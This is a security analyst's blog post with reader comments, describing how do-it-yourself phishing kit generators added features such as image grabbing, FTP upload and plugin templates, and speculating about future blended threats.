DIY phishing kits introducing new features

DIY phishing kits introducing new features

Summary: What are some of the main factors for the increase of phishing attacks, and their maturity from passive emails to blended threats attempting to not just steal personal information, but also infect with malware by embedding client-side vulnerabilities at the pages? It's all a matter of perspective, which in this post will emphasize on the continuing efforts on behalf of phishers to innovate, and introduce new features within the most recently obtained do-it-yourself phishing page generators.

SHARE:
TOPICS: Malware, Security
5

DIY Phishing KitWhat are some of the main factors for the increase of phishing attacks, and their maturity from passive emails to blended threats attempting to not just steal personal information, but also infect with malware by embedding client-side vulnerabilities at the pages? It's all a matter of perspective, which in this post will emphasize on the continuing efforts on behalf of phishers to innovate, and introduce new features within the most recently obtained do-it-yourself phishing page generators.

With the overall availability of phishing pages which phishers constantly update to keep track of the brand's changing login pages, phishing pages for every brand and financial institution can be easily perceived as a commodity good in the underground market. This trend is directly ruining the entry barriers into the phishing market segment, allowing novice phishers to use the very same scam pages, professional phishers once used to.

The DIY phishing kits trend started emerging around August, 2007, with the distribution of a simple kit (screenshots included), whose objective was to make it easy for a phisher already possessing the phishing page, to enter a URL where all the data would be forwarded to. Several months later, the kit went 2.0 (screenshots included) and introduced new preview, and image grabber features in order to make it easier for the phisher to obtain the images to be used in the attack.

In early 2008, two more phishing kits made it in the wild, with the first once having direct FTP upload capabilities as wellDIY Phishing Kit as automated updating of the latest phishing page, and the second one taking advantage of plugins under a .phish file extension. Both of the kits have a great deal of phishing pages coming with the default installations targeting brands like the following for starters :

AIM, Amazon, AOL, Bebo, Chas Bank, City Bank, Click and Buy, Ebay, Facebook, File Front, Freewebs, Friendster, Game Battles, Gmail, Hotmail, ICQ, iTunes, Money Bookers, Myspace, Nexon, Paypal, Photobucket, Rapidshare, Ripway, Runescape, Skype, Xbox, Yahoo Mail, Youtube

How does the Rock Phish kit, and botnets used as the primary distribution vectors fit into the picture? Just fine, given that custom tailored templates with the latest version of the login page is the foundation of any phishing campaign. Which also leads us to another perspective, namely, is someone getting successfully phished with the latest version of the original login page, or are they getting phished with an outdated one?

Key summary points:

  • this ongoing competition among the kits' creators, would ultimately serve the average phisher, empowering her with access to both the pages, and the ability to tweak them, and make it easy
  • the introduction of point and click upload functions is a great indication of features to come, in fact, knowing that Russian Business Network's infrastructure was participating in a phisher-in-the-middle attack is prompting me to "what if" known to be malicious and scammy infrastructure starts offering direct hosting access like the once introduced in the first kit
  • now that templates can be easier to configure, monitoring of changes made to the original login pages, and integrating upload
  • taking into consideration related security incidents where stolen FTP data was used to embed malicious iFrames at the affected servers, automating the upload process to take advantage of huge list of already compromised account data is prone to appear as a feature in the short term

Whereas for the time being phishing remains a passive attack on a large scale, the potential to evolve into a blended threat by default, including exploits that wouldDIY Phishing Kit serve malware on the phishing page itself has always been there. Lone phishers whose mentality has nothing to do with efficiency have been embracing the DIY trend for the past two years, and the efficiency minded continue using botnets to generate and send as many phishing pages as possible. However, the "benefits" coming from embedding exploits and malware on a phishing page in order to optimize the effect of the campaign if if the end user doesn't fall victim into the scam, can also trigger an alarm due to the embedded exploits, one that could have not been triggered in general if the phishing page was clean out of these.

To sum up - phishing tactics are evolving, in fact phishing pages are already getting hosted on defaced web servers, SQL injected to forward the survivability of the page to the injected server, and worse of all - this is done efficiently and would continue to be done even more efficiently.

Topics: Malware, Security

Dancho Danchev

About Dancho Danchev

Dancho Danchev is an independent security consultant and cyber threats analyst, with extensive experience in open source intelligence gathering, malware and cybercrime incident response.

Kick off your day with ZDNet's daily email newsletter. It's the freshest tech news and opinion, served hot. Get it.

Talkback

5 comments
Log in or register to join the discussion
  • Arrest them, Jail them.

    Make the posession of such software, with the exception of the scientific community, illegal and punishable by 5 years minimum in jail.

    Or send them to Gitmo. That would be my choics...
    BitTwiddler
    • Turn em loose

      in a room filled with people who have had their identies stolen, no cameras. Then they can see just how their crimes really do have a human face.

      TripleII

      No, it isn't too harsh, all of them are a waste of perfectly good skin.
      TripleII-21189418044173169409978279405827
    • Possession of what type of software?

      The problem with legislating against possession of software is that we have enough trouble already interpreting things like patent law when it relates to software. While there are obvious cases of software solely used to build malware, do you really want a court of law trying to determine where the line be drawn between a malware generator and development software? Any text editor could be considered a malware generator if you had the right person at the keyboard.
      gardoglee
      • Yes, criminalizing only hurts honest people

        Basically, it criminalizing research like this article. The criminals on the other hand won't care...

        But it won't be a first, some security research is already probably illegal in the US. That's probably why the best anti-virus packages comes from non-US countries, such as Australia and Russia.
        XP user
        • RE: Yes, criminalizing only hurts honest people

          I don't understand what you mean... Why would it be illegal in The US? But I agree with you, I have seen far better AV programs from overseas.
          greatnewproducts